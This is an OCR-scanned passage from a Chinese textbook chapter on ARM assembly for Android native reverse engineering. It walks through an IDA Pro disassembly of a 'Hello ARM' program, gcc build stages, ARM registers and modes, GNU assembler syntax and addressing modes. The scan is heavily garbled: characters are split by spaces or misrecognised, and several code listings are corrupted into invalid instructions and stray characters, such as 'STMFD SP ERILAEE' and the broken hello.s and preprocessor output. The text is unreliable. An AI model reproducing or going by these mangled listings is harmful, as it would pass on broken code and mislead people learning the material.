力 。 相 信 现 在 读者 应 该 能 够 理解 为 什么 本 书 会 花 掉 一 重 来 介绍 ARM 汇 
编 语 言 的 知识 了 。 

下 面 先 看 本 小 节 的 实例 程序 heallo， 一 个 ARM 原 生 程序 。 将 其 拖 入 
IDA Pro 软件 主 窗口 ， 双 击 函 数 窗 口 的 main， 定 位 到 main 函 数 的 代码 
处 ， 内 容 如 下 。 














i EXPORT main 

2 main 

阔 var_C= -0xC 

4 Var 8= -8 

S STMFD SP ERILAEE 

6 ADD 了 R 寺 4 光斑， 秆 机 

器 SUB SP, SP, #8 

8 STR ROG, [RTL1 ta 8 

9 STR RE: [Rlst ya | 

10 LDR R3, =(aHelloArm - 0x8300) 
二 ADD RS PCs :RR3 ; "Hello ARM!" 
12 MOV BA ES ; Ss 

J BL puts 

14 MOV 3。 祷 映 

9 MOV RO R3 

16 SUB 5 le 卉 志 


Be LDMF'D SPI AR ebe 

从 未 接触 过 ARM 汇 编 的 读者 看 到 这 些 奇 怪 的 “符号 ”肯定 会 觉得 英明 
其 妙 ， 这 些 都 是 什么 东西 ?其 实 它们 就 是 由 一 条 条 ARM 汇 编 指令 所 组 
成 的 汇编 代码 ， 我 们 将 其 称 为 原生 程序 的 反 汇 编 代 码 。 逆 向 原生 程序 就 
是 通过 阅读 这 些 汇编 代码 来 了 解 原生 程序 的 功能 及 流程 。 下 面 我 们 来 看 
看 这 段 代 码 的 具体 含义 : 

第 1 行 的 EXPORT main” 表 明 这 个 main 函 数 是 被 程序 导出 的 。 

第 2 行 的 main 为 函数 的 名 称 。JDA Pro 能 自动 识别 原生 程序 中 所 有 的 
函数 及 其 名 称 。 

第 3-4 行 是 IDA Pro 识 别 出 的 栈 变 量 。IDA Pro 是 通过 函数 中 分 配 的 栈 
空间 来 识别 栈 变 量 的 ， 本 实例 是 依据 第 7 行 的 *SUB SP, SP, #8” 指令 来 完 
成 的 ， 其 中 SUB 为 指令 操作 码 ， 表 示 减 法 操作 ，SP 为 堆栈 指针 寄存 器 

(关于 什么 是 寄存 器 将 在 6.2.3 节 介绍 ， 在 这 里 可 以 简单 理解 为 具有 特殊 
































用 途 的 变量 ) ， 这 条 指令 的 含义 是 将 SP 寄存 器 的 值 减 去 8 后 重新 赋 给 SP 
寄存 器 ， 作 用 是 在 堆栈 上 分 配 8 个 字 节 的 空间 ， 也 就 是 栈 变量 var_C 与 
var_8 的 空间 。 

第 5-17 行 是 main 函 数 指令 部 分 。 整 段 代 码 涉及 到 8 条 指令 ， 下 面 简 
单 地 介绍 一 下 它们 的 功能 。 

第 5 行 的 STMEFD 与 第 17 行 的 LDMFD 是 堆栈 寻 址 指令 ，STMFD 指 令 
用 于 把 寄存 器 的 值 压 入 堆栈 ， 在 本 实例 中 是 为 了 保护 原始 寄存 器 的 值 
(因为 这 些 寄存 器 在 下 面 可 能 会 被 使 用 ， 它 们 的 值 在 使 用 前 需要 保存 下 
来 ， 在 程序 返回 的 时 候 恢 复 ) ，LDMFD 指 令 用 于 从 堆栈 中 恢复 寄存 器 
的 值 ， 作 用 与 STMFD 恰 恰 相 反 。 

第 6 行 的 ADD 与 第 16 行 的 SUB 是 算术 指令 。ADD 为 加 法 指 
令 ,，“ADD R11,SP, #4” 就 是 将 SP 寄存 器 的 值 加 4 后 赋 给 R11 寄存 器 。SUB 
为 减法 指令 ， 第 16 行 的 代码 功能 与 第 6 行 恰恰 相反 。 

第 8-9 行 的 STR 与 第 10 行 的 LDR 是 存储 器 访问 指令 。 存 储 器 指 的 就 是 
内 存 地 址 ， 通 常 也 可 以 称 为 内 存单 元 或 存储 单元 ， 存 储 器 的 访问 包含 从 
存储 器 中 读数 据 与 写 入 数据 到 存储 器 中 ，ARM 指 令 中 将 存储 器 使 用 一 
对 中 括号 “[]* 表 示 ，STR 是 写 存 储 器 指令 ， 例 如 第 8 行 的 “STR RO, 
[R11,#var_8]”* 就 是 指 将 R0 寄 存 右 的 值 保存 到 栈 变 量 var_8 中 ， 第 9 行 
的 “STR R1, [R11,#var_C]” 则 将 R1 寄 存 器 的 值 保存 到 栈 变 量 var_C 中 。 

第 12 行 的 MOV 为 数据 处 理 指令 (部 分 书籍 将 其 称 为 数据 传送 指 
令 ) 。 它 用 于 寄存 器 间 的 数据 传送 ， 如 “MOV R0，R3?” 表 示 把 R3 寄 存 器 
的 值 赋 给 RO 寄存器 。 

第 13 行 的 BL 为 带 链接 的 跳 转 指令 。 完 成 类 似 其 它 编程 语言 中 子 程 
序 调 用 的 功能 ， 如 “BL puts” 就 是 调用 puts 函 数 。puts 为 标准 输入 输出 函 
数 中 printf 的 实现 ， 其 作用 是 向 标准 输出 设备 输出 指定 的 内 容 ， 本 实例 
中 输出 的 内 容 为 “Hello ARM!” 字 符 串 。 

整 段 ARM 汇 编 代 码 就 是 经 典 的 HelloWorld 程 序 ， 它 的 源码 如 下 。 














#include <stdio.h> 

int main(lint arge, char* argv[l]}i 
printf ("Hello ARM!\n"); 
return 0; 

} 


6.2.2 原生 程序 的 生成 过 程 


原生 程序 及 用 C/C++ 语言 来 编写 ， 为 什么 到 了 逆 同 分 析 的 时 候 却 变 
成 了 ARM 汇 编 代码 呢 ? 

这 还 得 从 原生 程序 的 生成 过 程 说 起 。 原 生 程 序 的 代码 是 由 Android 
NDK 中 提供 的 交叉 编译 工具 链 中 的 gcc 编 译 嚣 来 编译 的 (所 谓 交 义 编译 
工具 链 ， 指 的 是 能 在 一 种 平台 上 编译 出 另 一 种 平台 上 运行 的 程序 的 工具 
集合 ) 。 在 Windows 或 Linux 上 使 用 Android NDK 中 的 gcc 编 译 的 原生 程 
序 可 以 直接 在 Android 手 机 中 运行 ， 它 与 本 地 编译 是 相对 的 ， 本 地 编译 
即 当 前 平台 编译 ， 编 译 所 得 的 程序 只 能 在 当前 平台 上 运行 ， 通 常 ， 我 们 
也 可 以 将 交叉 编译 称 为 跨 平台 编译 。 

gcc 编 译 原 生 C 代 人 码 的 步 又 分 为 以 下 四 步 《C++ 代码 由 g++ 来 编 
下 

1. 预 处 理 

在 这 个 阶段 中 ， 编 译 器 将 处 理 C 代 人 码 中 的 预 处 理 指 令 ， 

如 “#include” 包 含 的 头 文 件 会 全 部 被 编译 进来 ， 还 有 “#define” 预 定 

义 、“ 才 人 ” 预 条 件 处 理 等 也 都 会 在 这 里 被 编译 器 处 理 。 详 细 的 输出 可 以 给 
gcc 编 译 器 传递 “-E” 选 项 查看 。 以 上 一 小 市 的 hello 为 例 ， 执 行 “gcc -E 
hello.c -o hello.i” 后 hello.i 文 件 内 容 如 下 (执行 以 上 命令 必须 确保 gcc 能 搜 
索 到 Android NDK 头 文件 路 径 ， 本 例 实 际 采 用 make 工 具 的 编译 脚本 来 进 
行 编译 ， 具 体 参 数 读 者 可 以 参看 配套 源 代码 中 本 小 市 实例 的 makefile 文 
件 ) 。 


























站 王 "hello€t 

非 : "Dillt ir” 

# 1 "<command-line>" 

i 
#1"c:/android-ndk-r8/platforms/android-l4/arch-arm/usr/include/stdio.h"1 
# 41 "c:/android-ndk-r8/platforms/android-l4/arch-arm/usr/include/stdio.h" 
#1"c:/android-ndk-r8/platforms/android-14/arch-arm/usr/include/sys/cdefs.h" 1 
# 59 "c:/android-ndk-r8/platforms/android-14/arch-arm/usr/include/sys/cdefs.h" 
# 1 "c:/android-ndk-r8/platforms/android-1l4/arch-arm/usr/include/sys/cdefs_ 
BLE. 

# 60 "c:/android-ndk-r8/platforms/android-14/arch-arm/usr/include/sys/cdefs.h" 2 


etatie, “inline int spute(int Cx TILDE * DB) + 


if (--_p->_w >= 0 || (_p->_w >= _p->_lbfsize && (char)_c != '\n')) 
return (* p-=>_p++ = _c); 

else 
returm (. Swbuft( ey ps 

} 

了 天 十 (下 二 droge, char* FOX 

printf ("Hello ARM!\n"); 

return 0; 

} 

2， 编译 





在 这 个 阶段 中 ，gcc 编 译 器 首先 要 检查 代码 的 规范 性 ， 以 及 是 否 
语法 错误 等 ， 以 确定 代码 的 实际 要 做 的 工作 ， 在 检查 无 误 后 ，gcc 编 译 
器 把 代码 翻译 成 ARM 汇 编 语言 的 代码 ， 可 以 为 gcc 编 译 器 传递 <-S "选项 
查看 输出 。 以 上 一 小 节 的 hello 为 例 ， 执 行 “gcc -S hello.i-o hello.s” 后 会 
生成 hello.s 汇 编 文 件 ， 它 的 内 容 如 下 。 


.arch armv5te 
.fpu softvfp 
.eabi attribute 20, 1 
.eabi_attribute 21, 1 
.type main, $%Sfunction 
main: 
@ args = 0, pretend = 0, frame = 8 
@ frame _ needed = 1, uses_anonymous_args = 0 
stmfd SB tH? le} 
add fp, sp, #4 
Bo 电 访 7: 潮 3 
str r0; [ED7 $B=8] 
St [EBs WL 
ss i 
EEC 人 
add Eade De TE3 
mo rT 广 台 
bl puts{PLT) 
mov r3, #0 
mow £0 TE 
Sud Sp :ps $4 
ldmfd SRL Lib Be 
细心 的 读者 会 发 现 ， 这 里 main 函 数 的 代码 与 6.2.1 小 节 分 析 的 内 容 基 
本 相同 ! 其 实 没 错 ， 功 能 代码 的 确 如 此 ， 只 是 多 了 一 些 汇编 器 指令 与 标 
号 等 信息 。 
3. 汇编 
这 个 阶段 gcc 编 译 器 会 调用 汇编 器 将 汇编 代码 汇编 成 二 进 制 目标 文 
件 。 以 上 一 小 节 的 hello 为 例 ， 执 行 “gcc -c hello.s -o hello.o” 后 会 生成 


hello.o 目 标 文 件 。 

4. 链接 

这 个 阶段 编译 器 会 调用 链接 器 将 二 进 制 的 目标 文件 链接 成 Android 
平台 可 执行 的 ARM 原 生 程 序 。 以 上 一 小 节 的 hello 为 例 ， 执 行 “gcc hello.o 
-0 hello” 后 会 生成 hello 可 执行 文件 (其 实 还 需要 链接 其 它 的 目标 文件 ， 
具体 参数 参见 本 小 节 makefile 脚 本 )〉。 

通过 上 面 4 个 阶段 的 分 析 可 以 发 现 ， 经 过 第 2 步 编译 后 C 代 码 就 变 成 
了 ARM 汇 编 代 码 。 既 然 C 代 码 最 终 都 会 变 成 汇编 代码 ， 那 可 以 直接 编写 
汇编 代码 来 开发 ARM 原 生 程序 吗 ? 

答案 是 肯定 的 ，Android ”NDK 文 持 直 接 使 用 ARM 汇 编 语 言 编写 的 
以 “.s” 结 尾 的 文件 作为 程序 的 源 文件 。 男 外 ， 开 发 人 员 还 可 以 使 用 C 代 码 
与 ARM 汇 编 代 码 混合 的 方式 来 编号 原生 程序 ， 这 与 Windows 平 台 或 
Linux 平 台 的 汇编 程序 开发 是 相同 的 ， 有 具体 的 实现 细节 此 处 不 再 展开 。 





6.2.3 ”必须 了 解 的 ARM 知 识 


在 开始 讲解 ARM 指 令 集 之 前 ， 我 们 先 来 看 看 ARM 汇 编 语 言 的 一 些 
特点 。 

首先 是 ARM 汇 编 语 言 与 Java 语 言 的 区 别 。ARM 汇 编 语言 是 一 门 “ 低 
级 ”语言 ， 它 能 够 与 系统 的 底层 打交道 ， 直 接 访 问 底层 便 件 资 源 ， 而 
Java 语 言 为 高 级 语言 ， 它 只 存在 于 框架 层面 ， 能 访问 的 资源 都 是 由 框架 
提供 ;其 次 ，ARM 汇 编 语 言 编 写 的 程序 运行 速度 快 ， 占 用 内 存 少 ， 缺 
点 是 编号 的 代码 难 懂 ， 也 难以 维护 ， 而 Java 语 言 开 发 的 程序 运行 速度 相 
对 较 慢 ， 占 用 内 存 多 ， 好 处 是 编写 的 代码 容易 理解 ， 开 发 效率 高 ; 最 
后 ，ARM 汇 编 语 言 编 号 的 程序 几乎 不 需要 其 它 代 码 的 转换 就 能 直接 运 
行 ， 源 码 与 反 编译 出 来 的 代码 基本 相似 ， 而 Java 语 言 编写 的 程序 需要 将 
其 转换 成 特定 的 字 节 码 才 能 在 Android 虚 拟 机 中 运行 。 















































其 次 是 ARM 汇 编 语言 能 实现 什么 功能 。ARM 汇 编 语言 与 C 语 言 共 
用 同一 套 原生 程序 开发 的 API 接 口 ， 而 且 两 者 都 是 基于 模块 化 的 面向 过 
程 的 编程 思想 。 因 为 C 语 言 编写 的 代码 在 编译 时 有 一 个 过 程 是 将 其 转换 
成 ARM 汇 编 代码 ， 所 以 可 以 这 么 理解 : C 语 言 能 实现 的 功能 ARM 汇 编 
语言 都 能 实现 。 

最 后 是 ARM 汇 编 语言 中 特有 的 寄存 器 。 寄 存 器 是 处 理 器 特有 的 高 
速 存 屹 部件， 它们 可 用 来 暂 存 指令 、 数 据 和 位 址 。 高 级 语言 中 用 到 的 变 
量 、 常 量 、 结 构 体 、 类 等 数据 到 了 ARM 汇 编 语 言 中 ， 就 是 使 用 寄存 器 
保存 的 值 或 内 存 地 址 。 寄 存 器 的 数量 有 限 ，ARM 微 处 理 器 共有 37 个 32 
位 寄存 右 ， 其 中 31 个 为 通用 寄存 器，6 个 为 状态 寄存 器 。ARM 处 理 器 文 
持 七 种 运行 模式 ， 它 们 分 别 为 : 

1. 用 户 模式 (usr) : ARM 处 理 器 正常 的 程序 执行 状态 。 

2. 快速 中 断 模式 (fig〉 : 用 于 高 速 数据 传输 或 通道 处 理 。 

3. 外 部 中 断 模 式 〈ird) : 用 于 通用 的 中 断 处 理 。 

4. 管理 模式 (svc)〉 : 操作 系统 使 用 的 保护 模式 。 

5. 数据 访问 终止 模式 〈abt) : 当 数 据 或 指令 预 取 终止 时 进入 该 模 
式 ， 可 用 于 虚拟 存储 及 存储 保护 。 

6. 系统 模式 (sys) : 运行 具有 特权 的 操作 系统 任务 。 

7. 未 定义 指令 中 止 模式 〈und) : 当 未 定义 的 指令 执行 时 进入 该 模 
式 。 

ARM 处 理 吉 的 运行 模式 可 以 通过 软件 改变 ， 也 可 以 通过 外 部 中 断 
或 异种 处 理 改变 。 在 不 同 模式 下 ， 处 理 需 使 用 的 寄存 器 不 尽 相 同 ， 而 且 
可 供 访问 的 资源 也 不 一 样 。 在 这 7 个 模式 中 ， 除 了 用 户 模式 外 ， 其 它 六 
种 模式 均 为 "特权 ?模式 ， 在 “特权 ?模式 下 ， 处 理 器 可 以 任意 访问 受 保护 
的 系统 资源 。 本 书 将 要 讲解 的 ARM 程 序 逆 向 分 析 技术 只 涉及 到 用 户 模 
于 

在 用 户 模式 下 ， 处 理 器 可 以 访问 的 寄存 需 为 不 分 组 寄存 器 R0 一 


























R7、 分 组 寄存 器 R8 一 R14、 程 序 计数 器 R15 (PC) 以 及 当前 程序 状态 寄 
存 器 CPSR。 

ARM 处 理 器 有 两 种 工作 状态 : ARM 状 态 与 Thumb 状 态 。 处 理 器 可 
以 在 两 种 状态 之 间 随 意 切 换 。 当 处 理 器 处 于 ARM 状 态 时 ， 会 执行 32 位 
字 对 齐 的 ARM 指 令 ， 当 处 于 Thumb 状 态 时 ， 执 行 的 是 16 位 对 齐 的 Thumb 
指令 。Thumb 状 态 下 对 寄存 器 的 命名 与 ARM 有 部 分 差异 ， 它 们 的 关系 如 
下 : 

e Thumb 状 态 下 的 R0 一 R7 与 ARM 状 态 下 的 RO 一 R7 相 同 。 

e Thumb 状 态 下 的 CPSR 与 ARM 状 态 下 的 CPSR 相 同 。 

e Thumb 状 态 下 的 FP 对 应 于 ARM 状 态 下 的 R11。 

e Thumb 状 态 下 的 卫 对 应 于 ARM 状 态 下 的 R12。 

e Thumb 状 态 下 的 SP 对 应 于 ARM 状 态 下 的 R13。 

e Thumb 状 态 下 的 LR 对 应 于 ARM 状 态 下 的 R14。 

e Thumb 状 态 下 的 PC 对 应 于 ARM 状 态 下 R15。 

寄存 器 可 以 通俗 的 理解 为 存放 东西 的 “ 储 物 柜 *”， 并 不 具备 其 它 的 功 
能 ， 代 人 码 能 实现 什么 功能 完全 是 由 处 理 器 的 指令 来 决定 的 。 例 如 想 完成 
一 则 加 法 运算 ， 让 处 理 器 执行 ADD 加 法 指令 即 可 。 我 们 将 ARM 处 理 器 
所 有 支持 的 指令 统称 为 ARM 指 令 集 ， 指 令 集中 的 每 一 条 指令 都 有 着 自 
己 的 格式 ， 在 编写 ARM 汇 编程 序 时 需要 严格 的 遵守 指令 规范 ， 详 细 的 
指令 集 内 容 将 在 6.5 小 节 进 行 介绍 。 

















6.3 ARM 汇编 语 言 程序 结构 


Android 平 台 的 ARM 汇 编 是 GNU ARM 汇编 格式 ， 使 用 的 汇编 器 
(汇编 占 的 功能 是 将 汇编 代码 转换 为 二 进 制 目标 文件 ) 为 GAS (GNU 
Assembler，GNU 汇 编 器 ) ， 它 有 痢 一 套 自 己 的 语法 结构 。 读 者 可 以 访 
问 如 下 的 网 站 来 查看 其 在 线 手册 : 
http://sourceware.org/binutils/docs/as/index.html。 
本 章 以 下 部 分 提 到 的 ARM 江 编 均 是 指 GNU ARM 汇 编 。 











6.3.1 ”完整 的 ARM 汇 编程 序 


实例 代码 采用 6.2.2 小 节 的 hello.s 汇 编 文 件 进 行 讲解 ， 它 的 内 容 如 
a 


MD 0 I UD PP 


FF 
DP 口 


29 


.arch armwv5te 


@ 处 理 器 架构 


.fpu softvfp @ 协 处 理 器 类 型 

.eabi_attribute 20, 1 e 接 口 属 性 

.eabi_attribute 21, 1 

.eabi_attribute 23, 3 

.eabi_attribute 24, 1 

.eabi_attribute 25, 1 

.eabi attribute 26, 2 

.eabi attribute 30, 6 

.eabi attribute 18, 4 

.file "hello.c" @ 源 文件 名 

.Section -Todata @ 声 明 只 读数 据 段 

-align 2 @ 对 齐 方 式 为 2^2=4 字 节 
el @ 标 号 LC0 

.ascii "Hello ARM!\000" @ 声 明 字 符 串 

.text @ 声 明代 码 段 (code section) 

gn 2 @ 对 齐 方式 为 2^2=4 字 节 

.global main @ 全 局 符号 main 

.type main, Sfunction @main 类 型 为 函数 
main: @ 标 号 main 

@ args = 0, pretend = 0, frame = 8 


@ frame_ needed = 1, 


stmfd sp!, {fp, lr} 
add fp, sp, #4 
sub sp, sp, #8 
str r0; [fp; #=8] 
Stt Tl, EES: #1 
lar 下 37 <L3 
.LPICO: 
ac LT3; Pe 江 3 
mov r0, r3 
bl puts{(PLT) 
mov r3, #0 
mov r0, r3 
sub sp, fp, #4 
ldmfd sp!, {fp, pc} 
.L4: 
.align 2 
3 
.word .LC0-( .DLPIC0+8) 
.Size main, .-main 
.ident "GCC: (GNU) 4.4.3" 
.Section 


.note.GNU-stack,"",%®%progbits 


uses_anonymous_args = 0 


e@ 将 Ep、1z 寄 存 器 压 入 堆栈 

e@ 初 始 化 fp 寄存 器 ， 设 置 栈 帧 ， 用 于 访问 局 部 变量 
e@ 开 辟 栈 空间 

@ 保 存 第 一 个 参数 

@ 保 存 第 二 个 参数 

@ 取 标号 .43 处 的 内 容 ， 即 “Hello Gas” 的 偏 移 地 址 
@ 标 号 .LPICO 

@ 计 算 字 符 串 “Hello GAS” 的 内 存 地 址 

@ 设 置 参 数 1 

@ 调 用 puts 函 数 

@ 设 置 r3 寄 存 器 的 值 为 0 

@ 程 序 返 回 结 果 为 0 

@ 恢 复 sp 寄存 器 的 值 

@ 恢 复 fp 寄存 器 ， 并 将 1r 寄 存 器 值 赋 给 pc 寄存 器 
@ 标 号 .L4 

@ 对 齐 方 式 为 2^2=4 字 节 

@ 标 号 .L3 

@ 保 存 字 符 串 相对 “adqd r3，pc，r3” 的 偏 移 量 
@main 函 数 的 大 小 为 当前 代码 行 减 去 main 标 号 

@ 编 译 器 标识 

@ 定 义 .note.GNU-stack 段 


整个 hello.s 汇 编 文 件 虽 然 比 较 短 ， 但 包含 了 ARM 汇 编程 序 的 整个 杠 
2 完整 的 ARM 汇 编程 序 包括 处 理 器 架构 定义 、 数 据 段 、 代 码 段 
i 数 。 接 下 来 我 们 通过 这 个 例子 来 逐 段 的 介绍 ARM 汇 编程 序 的 
结构 。 


6.3.2 ”处 理 器 架构 定义 


程序 的 开头 代码 语句 为 : 


,arch armv5te 8@ 处 理 器 架构 
,fpu softvfp @ 协 处 理 器 类 型 
.eabi_attribute 20, @ 接 口 属 性 
.eabi attribute 21, 
.eabi_attribute 23, 
.eabi attribute 24, 
.eabi attribute 25, 
.eabi_attribute 26, 
.eabi attribute 30, 
.eabi attribute 18, 

这 些 指令 指定 了 程序 使 用 的 处 理 器 加 构 、 协 处 理 器 类 型 与 接口 的 一 
些 属性 。 

.arch 指 定 了 ARM 处 理 器 架构 。armv5te 表 示 本 程序 的 代码 可 以 在 
armv5te 架 构 的 处 理 器 上 运行 ， 除 此 之 外 ， 它 还 可 以 是 armv6、armv7-a 

， 不 同 的 处 理 器 架构 支持 的 指令 集 不 同 ， 如 果 代 码 中 使 用 了 指定 处 理 

架构 不 文 持 的 指令 ， 代 码 在 编译 时 会 报错 。 

.fpu 指 定 了 协 处 理 器 的 类 型 。softvfp 表 示 使 用 浮 点 运算 库 来 模拟 协 
处 理 占 运算 ， 之 所 以 会 出 现 这 个 选项 ， 是 因为 很 多 时 候 为 了 市 省 处 理 右 
的 生产 成 本 ， 出 广 的 ARM 处 理 器 中 不 带 协 处 理 需 单元 ， 所 有 的 浮 点 运 
算 只 能 通过 软 模拟 的 形式 来 完成 ， 在 对 硬件 条 件 没 有 要 求 的 情况 下 ， 可 


ONNR PP HR bp 











以 使 用 这 个 保守 选项 ， 另 外 ， 还 可 以 给 .fpu 贱 值 为 vfpv2、vfpv3 来 指定 
使 用 处 理 器 自 带 的 协 处 理 器 。 

.eabi_attribute 指 定 了 一 些 接口 属性 。EABI (Embedded ” Application 
Binary ”Interface， 典 入 式 应 用 二 进 制 接口 ) 是 ARM 制 定 的 一 套 接 口 规 
范 ，Android 系 统 实现 了 和 它 ， 此 处 的 属性 值 在 编译 多 数 程序 时 都 是 固定 
的 ， 但 笔者 在 相关 文档 中 没有 找到 其 含义 描述 ， 故 此 不 再 深究 。 


6.3.3 ”上段 定义 


程序 中 有 段 的 概念 大 概要 追溯 到 远古 的 DOS 时 代 了 ， 现 在 的 高 级 语言 
很 少 直接 使 用 到 段 ， 这 些 都 是 由 编译 器 来 自动 生成 的 。 像 C 语 言 中 使 用 
到 的 全 局 变量 、 常 量 等 信息 编译 器 都 会 将 其 编译 到 一 个 名 为 “.data” 的 数 
据 段 中 ， 如 果 细 分 的 话 ， 第 量 数据 会 被 编译 到 名 为 “rodata" 的 只 读数 据 
段 中 ， 这 些 数据 段 都 是 不 可 执行 的 ， 而 代码 则 会 编译 到 名 为 “.text” 的 代 
人 码 段 中 。ARM 汇 编 使 用 “.section” 指 令 来 定义 段 (section 原 义 为 区 段 ， 有 
些 书籍 中 解释 为 节 区 ， 读 者 在 此 不 必 计 较 ， 理 解 其 含义 即 可 ) ， 它 的 格 
式 为 : 

.Section name [, "flags"[, %typel,flag_specific_arguments]]] 

name 为 段 名 ，flags 为 段 的 属性 如 读 、 写 、 可 执行 等 ，type 指 定 了 段 
的 类 型 ， 如 progbits 表 示 段 中 包含 有 数据 、note 表 示 段 中 包含 的 数据 非 程 
序 本 丑 使 用 ，flag_specific_arguments 指 定 了 一 些 平台 相关 的 参数 。 

本 实例 定义 了 三 个 段 : 

“.section .rodata" 定 义 只 读数 据 段 ， 属 性 采用 默认 。 

“text” 定 义 了 代码 段 ， 没 有 使 用 .section 关 键 字 。 

“section .note.GNU-stack,"",%progbits” 定 义 .note.GNU-stack 段 ， 它 的 
作用 是 禁止 生成 可 执行 堆栈 ， 用 来 保护 代码 安全 ， 可 执行 堆栈 常 沼 被 用 
来 引发 堆栈 溢出 之 类 的 漏洞 ， 关 于 这 方面 的 探讨 读者 可 以 阅读 软件 漏洞 




















研究 方面 的 书籍 。 
6.3.4 注释 与 标号 


为 程序 编写 注释 是 一 个 民 好 的 编程 习惯 ，GNU _ ARM 汇编 文 持 两 种 
在 代码 中 添加 注释 的 方法 。 

第 一 种 为 C 语 言 中 的 %/* */” 型 注释 ， 在 “/*” 与 “*/” 之 间 包 含 的 所 有 内 
容 都 会 被 汇编 器 认定 为 注释 ， 例 如 下 面 的 代码 : 

/这 里 为 main 函 数 的 起 始 位 置 */ 


main: 





“/* */” 型 注释 多 用 于 大 批量 的 注释 ，GNU ARM 还 支持 单行 代码 注 
释 ， 方 法 是 在 代码 的 最 后 使 用 符号 “@” 开 涉 ，6.3.1 小 节 的 代码 就 采用 此 
种 方法 进行 注释 。 

在 ARM 汇 编 代 码 中 ， 标 号 是 十 分 常见 的 。 当 在 程序 中 使 用 跳 转 指 
令 进行 跳 转 的 时 候 ， 可 以 使 用 标号 作为 跳 转 的 目的 地 ， 汇 编 器 在 编译 时 
会 将 标号 转换 为 地 址 。 标 号 的 声明 方法 是 : 


< 标号 名 > : 
如 下 面 的 代码 就 是 一 个 简单 的 循环 。 
LOOP : 


SUB :RO; 及 0 #1 
CMP RO, #0 
BNE LOOP 


6.3.5 汇编 器 指令 


程序 中 所 有 以 点 < 开头 的 指令 都 是 汇编 器 指令 ， 汇 编 器 指令 是 与 汇 


编 器 相关 的 ， 它 们 不 属于 ARM 指 令 集 。GAS 汇 编 器 文 持 的 汇编 器 指令 
比较 多 ， 在 GAS 在 线 文档 的 第 7 章 “Assembler Directives” 中 列 出 了 所 有 的 
汇编 器 指令 。 

本 实例 使 用 到 的 汇编 器 指令 有 : 

.file: 指定 了 源 文件 名 。 实 例 hello.s 是 从 hello.c 编 译 得 来 的 ， 手 写 汇 
编 代码 时 可 以 忽略 它 。 

.align: 指定 代码 对 齐 方式 ， 后 面 跟 的 数值 为 2 的 次 数 方 。 如 “.align 
4” 表 示 2^4=16 字 节 对 齐 。 

.ascii: 声明 字符 串 。 

.gobal: 声明 全 局 符号 。 全 局 符号 是 指 在 本 程序 外 可 以 访问 的 符 





号 。 

.type: 指定 符号 的 类 型 。“.type main，%function” 表 示 main 符 号 为 函 
数 。 

.word: 用 来 存放 地 址 值 。“.word .LC0-(.LPIC0+8)” 存 放 的 是 一 个 与 
地 址 无 关 的 偏 移 量 。 

.size: 设置 指定 符号 的 大 小 。“.size main, .-main” 中 的 点 “.” 表 示 当 前 
地 址 ， 减 去 main 符 号 的 地 址 即 为 整个 main 函 数 的 大 小 。 

.ident: 编译 器 标识 ， 无 实际 用 途 ， 生 成 可 执行 程序 后 它 的 值 被 放 
置 到 “.comment* 段 中 。 


6.3.6” 子 程序 与 参数 传递 


子 程序 在 代码 中 用 来 完成 一 个 独立 的 功能 ， 很 多 时 候 子 程序 与 函数 
是 相同 的 概念 。ARM 汇 编 中 声明 函数 的 方法 如 下 : 











.global ”所 逆 各 
.type 区 米色, Wfunction 
0 
… 邱 数 扎 …> 
例如 声 明 一 个 实现 两 个 数 相 加 的 函数 的 代码 为 : 
.global MyAdd 
.type MyAdd, %®function 
MyAdd: 
ADD r0，r0，rl @ 两 个 参数 相 加 
MOV pc，1r @ 函 数 返回 
既然 是 函数 调用 ， 就 肯定 存在 函数 参数 传递 的 问题 。ARM 汇 编 中 
规定 : R0-R3 这 4 个 寄存 器 用 来 传递 函数 调用 的 第 1 到 第 4 个 参数 ， 超 出 的 
参数 通过 堆栈 来 传递 。R0 寄 存 器 同时 用 来 存放 函数 调用 的 返回 值 。 被 调 
用 的 函数 在 返回 前 无 须 恢复 这 些 寄 存 器 的 内 容 。 











6.4 _ ARM 处理 器 寻 址 方式 


处 理 器 寻 址 方式 是 指 通过 指令 中 给 出 的 地 址 码 字段 来 寻找 真实 操作 
数 地址 的 方式 。 尽 管 ARM 处 理 器 采用 的 是 精简 指令 集 ， 但 指令 间 的 组 
合 灵活 度 却 比 x86 处 理 器 要 高 ，x86 处 理 器 支持 七 种 寻 址 方式 ， 而 ARM 
处 理 器 文 持 九 种 寻 址 方式 。 





6.4.1 立即 寻 址 








立即 寻 址 是 最 简单 的 一 种 寻 址 方式 ， 大 多 数 的 处 理 器 都 支持 这 种 寻 
址 方式 。 立 即 寻 址 指令 中 后 面 的 地 址 码 部 分 为 立即 数 〈 即 常量 或 常 
数 ) ， 立 即 寻 址 多 用 于 给 寄存 器 赋 初 值 。 并 且 立 即 数 只 能 用 于 源 操作 数 
字段 ， 不 能 用 于 目的 操作 数字 段 。 例 如 : 

MOV RO, #1234 

间 令 执行 后 R0=1234。 立 即 数 以 只 ”作为 前 级 ， 表 示 十 六 进 制 数值 时 
以 “0x” 开 涉 ， 如 #0x20。 





6.4.2 ”寄存 器 寻 址 


寄存 器 寻 址 中 ， 操 作 数 的 值 在 寄存 顺 中 ， 指 令 执行 时 直接 从 寄存 天 
中 取 值 进行 操作 。 例 如 : 


MO :RO :我 主 
站 令 执 行 后 RO=R1。 


6.4.3 ”寄存 器 移 位 寻 址 











寄存 器 移 位 寻 址 是 ARM 指 令 集 特有 的 寻 址 方式 ， 寄 存 器 移 位 寻 址 








与 寄存 器 寻 址 类 似 ， 只 是 在 操作 前 需要 对 源 寄存 器 操作 数 进行 移 位 操 
站 

寄存 器 移 位 寻 址 支持 以 下 五 种 移 位 操作 ; 

LSL: 逻辑 左 移 ， 移 位 后 寄存 器 空 出 的 低位 补 0。 

LSR: 逻辑 右 移 ， 移 位 后 寄存 器 空 出 的 高 位 补 0。 

ASR: 算术 右 移 ， 移 位 过 程 中 符号 位 保持 不 变 ， 如 果 源 操作 数 为 正 
数 ， 则 移 位 后 空 出 的 高 位 补 0， 和 否则 补 1。 

ROR: 循环 右 移 ， 移 位 后 移出 的 低位 填 入 移 位 空 出 的 高 位 。 

RRX: 带 扩展 的 循环 右 移 ， 操 作 数 右 移 一 位 ， 移 位 空 出 的 高 位 用 C 
标志 的 值 填充 。 

例如 : 


MOY 了 肝 寺 ，SE 浪 这 
指令 的 功能 是 将 R1 寄 存 器 左 移 2 位 ， 即 “R1 << 2” 后 赋值 给 R0 寄 存 
器 ， 指 令 执行 后 RO=R1*4。 


6.4.4 ”寄存 右 间 接 寻 址 


寄存 器 间接 寻 址 中 地 址 码 给 出 的 寄存 器 是 操作 数 的 地 址 指针 ， 上 所 需 
